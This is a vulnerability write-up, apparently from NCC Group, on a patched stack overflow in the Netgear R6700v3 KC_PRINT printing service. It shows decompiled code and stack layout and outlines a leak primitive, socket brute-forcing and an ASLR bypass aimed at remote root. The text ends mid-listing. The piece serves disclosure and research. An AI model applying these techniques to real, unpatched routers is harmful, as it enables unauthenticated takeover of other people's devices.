Summary
This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams of the Exploit Development Group (EDG) at NCC Group. The vulnerability was patched in the firmware update referenced in the following Netgear advisory.
The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through a USB port. No configuration change is needed, so the default configuration is exploitable as soon as a printer is connected to the router.
This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.
Our exploitation method is very similar to what was used in the Tokyo Drift paper, i.e. we chose to change the admin password and start the utelnetd service, which then allowed us to get a privileged shell on the router.
We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.
Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.
We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.
Vulnerability details
Background on ReadySHARE
This video explains well what ReadySHARE is, but it basically allows you to access a USB printer through the Netgear router as if the printer were a network printer.
Reaching the vulnerable memcpy()
The KC_PRINT
binary does not have symbols but has a lot of logging/error functions
which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays
as no open source has been found for this binary.
The KC_PRINT
binary creates lots of threads to handle different features:
The first thread handler we are interested in is ipp_server()
at address 0xA174
.
We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection()
at address 0xA4B4
and passes the client socket to this new thread.
void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // listen backlog: up to 128 pending connections
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}
The client handler calls into do_http() at address 0xA530:
void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}
The do_http() function reads an HTTP-like request into a 1024-byte stack buffer until it finds the end of the HTTP headers (\r\n\r\n). It then searches for a POST /USB URI followed by an _LQ string, and parses the characters in between as the integer usblp_index. It then calls into is_printer_connected() at 0x16150.
The is_printer_connected() function won’t be shown for brevity, but all it does is open the /proc/printer_status file, try to read its content and look for a USB port by searching for a string like usblp%d. This string is only found if a printer is connected to the Netgear router, so execution never continues further if no printer is connected.
unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));
  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;
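The request-line checks performed by do_http() can be modelled in a few lines of Python. This is only a sketch of the logic visible in the decompilation, not the binary's code: the names atoi and parse_usblp_index are hypothetical helpers, and the sample request line in the usage note is an assumption built from the POST /USB and _LQ markers alone.

```python
import re
from typing import Optional


def atoi(data: bytes) -> int:
    """Approximate C atoi(): skip leading whitespace, parse an optional sign
    and the leading digits, and return 0 when no digits are present."""
    match = re.match(rb"\s*([+-]?\d+)", data)
    return int(match.group(1)) if match else 0


def parse_usblp_index(headers: bytes) -> Optional[int]:
    """Mirror the checks do_http() applies before is_printer_connected().

    Returns the parsed index, or None where the decompiled code returns -1.
    """
    start = headers.find(b"POST /USB")
    if start < 0:
        return None
    start += len(b"POST /USB")           # points after "POST /USB"
    end = headers.find(b"_LQ", start)
    if end < 0:
        return None
    index = atoi(headers[start:end])
    if index > 10:                       # same upper bound as the decompiled code
        return None
    return index
```

For instance, parse_usblp_index(b"POST /USB1_LQ HTTP/1.1\r\n\r\n") yields 1, while a request without the POST /USB marker yields None.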
It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on the values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0, which is the one we are interested in.
  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0); // only 8 bytes are read initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...
The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copies the 8 bytes already read into it and reads the remaining bytes into that new heap buffer.
Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.
Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in Response_Get_Jobs() at 0x102C4, which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows, but Response_Get_Jobs() seemed the most straightforward to exploit, so we targeted this function.
unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
          }
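The nested conditions above amount to a dispatch on bytes 2 and 3 of the content, read as a big-endian 16-bit value. The following sketch restates that dispatch; select_handler is a hypothetical name, and the branches that are elided in the listing are reported as such rather than guessed. The values 0x0005 and 0x000A happen to match the Create-Job and Get-Jobs operation identifiers of the IPP specification, which is consistent with the handler names recovered from the binary.

```python
def select_handler(request: bytes) -> str:
    """Return the name of the handler the decompiled dispatcher would pick."""
    if len(request) < 8:
        raise ValueError("the service reads 8 bytes before dispatching")
    # "recv_buf[2] || recv_buf[3] != N" is true unless bytes 2..3 equal N
    # when read as a big-endian 16-bit integer.
    operation = int.from_bytes(request[2:4], "big")
    if operation in (0x02, 0x06):
        return "handled elsewhere in do_http() (not shown in the listing)"
    if operation == 0x0A:
        return "Response_Get_Jobs"
    if operation == 0x05:
        return "Response_Create_Job"
    if operation in (0x04, 0x08, 0x09, 0x0B):
        return "elided in the decompiled listing"
    return "Response_Unk_1"
```

Any 8-byte prefix whose bytes 2 and 3 are 0x00 0x0A therefore reaches the vulnerable function.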
The first part of the vulnerable Response_Get_Jobs() function code is shown below:
// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_ptr is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_ptr's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy 0x42 bytes from table keywords into indexes 8..73
  copied_len = memcpy_at_index(prefix_ptr, in_offset, table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit
    // this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;
        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                 // iteration 1: offset = 10 after this

      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;   // we can set a copy_len == 0 to simplify this
                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 64-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len); // VULN: stack overflow here
        ...
It starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1, which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs remains 0.
Above we see 2 memset() calls for 2 stack buffers that we named job_data and suffix_data.
We then enter the if ( !bReadAllJobs ) block. We craft client data so that the while ( recv_buf[offset] != 3 && offset <= content_len ) condition is satisfied and we enter the loop.
We also need to set flag2 = 1, so we craft the client data to satisfy the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.
Later inside the while loop, if flag2 is set, a 16-bit size (maximum 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. This size is then used as the length argument to memcpy() when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based overflow vulnerability where we control both the overflowing size and content. There is no limitation on the byte values used for overflowing, which makes it a very nice vulnerability to exploit at first sight.
Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.
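To make the size mismatch concrete, the length arithmetic can be reproduced outside the binary. This is a minimal sketch: read_copy_len and overflow_bytes are hypothetical helper names, and the only facts taken from the decompilation are the 16-bit big-endian read and the 64-byte size of command[].

```python
COMMAND_SIZE = 64  # sizeof(command) in the decompiled function


def read_copy_len(recv_buf: bytes, offset: int) -> int:
    """Same arithmetic as: (recv_buf[offset] << 8) + recv_buf[offset + 1]."""
    return (recv_buf[offset] << 8) + recv_buf[offset + 1]


def overflow_bytes(copy_len: int) -> int:
    """Number of bytes memcpy() would write past the end of command[]."""
    return max(0, copy_len - COMMAND_SIZE)
```

A legitimate attribute name such as job-id (6 bytes) fits comfortably, whereas the maximum encodable length of 0xffff writes 65471 bytes beyond the buffer.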
Reaching the end of the function
It is now important to look at the stack layout from the command[] array we are overflowing from. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control the values of all the other local variables post-overflow. Remember that we are in the while loop at the moment, so the initial idea is to get out of this loop as soon as possible. By overwriting local variables and setting them to appropriate values, this should be easy.
-00001090 command DCB 64 dup(?)
-00001050 suffix_data DCB 2048 dup(?)
-00000850 job_data DCB 2048 dup(?)
-00000050 error DCD ?
-0000004C copy_len DCD ?
-00000048 copy_len_1 DCD ?
-00000044 copied_len DCD ?
-00000040 prefix_size DCD ?
-0000003C in_offset DCD ?
-00000038 prefix_ptr DCD ? ; offset
-00000034 usblp_index DCD ?
-00000030 client_sock DCD ?
-0000002C kc_client_1 DCD ?
-00000028 offset_job DCD ?
-00000024 DCB ? ; undefined
-00000023 DCB ? ; undefined
-00000022 DCB ? ; undefined
-00000021 bReadAllJobs DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name DCB ?
-0000001B is_job_id DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2 DCB ?
-00000018 final_size DCD ?
-00000014 offset DCD ?
-00000010 response_len DCD ?
-0000000C final_ptr DCD ? ; offset
-00000008 suffix_offset DCD ?
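The layout above also tells us how many bytes separate the start of command[] from each local variable that the overflow has to set. The sketch below only does that subtraction on offsets copied from the listing; FRAME and distance_from_command are hypothetical names, and the position of the saved registers is deliberately left out because it is not part of the listing.

```python
# Offsets relative to the frame base, copied from the stack layout above.
FRAME = {
    "command": -0x1090,
    "suffix_data": -0x1050,
    "job_data": -0x850,
    "prefix_size": -0x40,
    "prefix_ptr": -0x38,
    "client_sock": -0x30,
    "flag2": -0x19,
    "offset": -0x14,
    "suffix_offset": -0x08,
}


def distance_from_command(name: str) -> int:
    """Bytes between the start of command[] and the named local variable."""
    return FRAME[name] - FRAME["command"]
```

For example, prefix_ptr sits 0x1058 bytes after the start of command[], client_sock 0x1060 bytes and offset 0x107C bytes, so all three are overwritten by any copy long enough to reach the end of the frame.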
So after our overflowing memcpy(), we decide to set client data to hold the "job-id" command to simplify the code paths being taken. Then we see the offset += copy_len statement. Since we control both the copy_len and offset values due to our overflow, we can craft values that make us exit the loop condition while ( recv_buf[offset] != 3 && offset <= content_len ), for instance by setting offset = content_len+1.
Next we execute the 2nd read_job_value() call because bReadAllJobs == 0. The read_job_value() function is not relevant for us, but its purpose is to loop over all the printer’s jobs and save the requested data (in our case the job-id). We assume there is no print job at the moment, so nothing will be read. This means the offset_job being returned is 0.
  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit
    // this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len); // VULN: stack overflow here

        // dispatch to right command
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id " command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;       // this is executed before looping
    }
  }
  // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);
Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now, as it contains a label that we will jump to later, which is why we kept it in the code below).
Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.
Finally, the 2 heap buffers pointed to by prefix_ptr and final_ptr are freed and the function exits.
  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx
  // variables == 0 as explained above
  if ( offset_job > 0 )         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    // the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can make it copy any size from any
    // address which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}
Exploitation
Mitigations in place
Our goal is to overwrite the return address to get $pc control but there are a few challenges here.
We need to know what static addresses we can use.
Checking the ASLR settings of the kernel:
# cat /proc/sys/kernel/randomize_va_space
1
From here:
- 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
- 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
- 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.
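The three values listed above can be turned into a tiny lookup when checking a target from a script. This is only a convenience sketch: ASLR_MODES and describe_aslr are hypothetical names, and the descriptions are shortened from the list above.

```python
ASLR_MODES = {
    0: "disabled",
    1: "stack, VDSO page and shared memory regions randomized",
    2: "stack, VDSO page, shared memory regions and data segment randomized",
}


def describe_aslr(raw_value: str) -> str:
    """Map the content of randomize_va_space to a short description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown setting")
```

On a Linux host the input would typically come from reading /proc/sys/kernel/randomize_va_space; on the router analysed here the file contains 1, so the data segment (and therefore the heap that follows it) is not randomized.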
Checking the mitigations of the KC_PRINT binary using checksec.py:
[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-V1.0.4.118_10.0.90.zip.extracted/_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
Arch: arm-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8000)
So to summarize:
- KC_PRINT: not randomized
  - .text: read/execute
  - .data: read/write
- Libraries: randomized
- Heap: not randomized
- Stack: randomized
Building a leak primitive
If we go back to the previous decompiled code we discussed, there are a few things to point out:
final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);
The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.
prefix_ptr needs to be a valid address, and prefix_size bytes will be copied from this address into final_ptr. Then that data will be sent back to the client socket, assuming client_sock is a valid socket.
This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.
However, what if we overwrite the whole stack frame containing all the local variables but leave the saved registers and the return address untouched? Well, it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.
Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT, the client_sock value could differ between KC_PRINT executions. However, once KC_PRINT is started, it keeps allocating the same client_sock for every connection as long as we close the previous connection.
This is a perfect scenario for us since it means we can initially brute force the socket value by overflowing the entire stack frame (except the saved registers and return address) until we get an HTTP response, and KC_PRINT never crashes. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?
Bypassing ASLR and achieving command execution
Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a heap address that is valid for free().
However, after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why, as we didn’t investigate due to time constraints. However, this opens new opportunities. Indeed, the .got is at a static address because KC_PRINT is compiled without PIE support. It means we can leak the address of an imported function like memset(), which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.
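The deduction described above is plain pointer arithmetic once the leaked bytes are in hand. The sketch below assumes the caller has already isolated the leaked bytes from the response; the function names are hypothetical, and the symbol offsets used in the usage note are made-up placeholders, not values taken from the router's libc.

```python
def parse_leaked_pointer(leak: bytes) -> int:
    """Decode the first 4 leaked bytes as a little-endian 32-bit pointer
    (the target is arm-32-little according to checksec)."""
    if len(leak) < 4:
        raise ValueError("need at least 4 leaked bytes")
    return int.from_bytes(leak[:4], "little")


def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset inside the library from its leaked address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # A library mapping starts on a page boundary, so anything else
        # indicates a wrong offset or a bad leak.
        raise ValueError("computed base is not page-aligned")
    return base


def resolve(base: int, symbol_offset: int) -> int:
    """Address of another symbol of the same library."""
    return (base + symbol_offset) & 0xFFFFFFFF
```

With a placeholder memset() offset of 0x3A1C0 and a leaked value of 0x401A81C0, the base comes out as 0x4016E000, which matches the libc mapping shown in the process maps later in this post; a placeholder system() offset of 0x5A270 would then resolve to 0x401C8270.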
Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack, but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do on ARM (32-bit) because ARM instructions are 4-byte aligned, which makes it impossible to use unaligned instructions as gadgets. We also thought about switching from ARM mode to Thumb mode. But is there an even easier method?
What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.
Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.
# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429 /usr/bin/KC_PRINT // static
00018000-00019000 rw-p 00010000 1f:03 1429 /usr/bin/KC_PRINT // static
00019000-0001c000 rw-p 00000000 00:00 0 [heap] // static
4001e000-40023000 r-xp 00000000 1f:03 376 /lib/ld-uClibc.so.0 // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376 /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376 /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265 /lib/libpthread.so.0 // ASLR
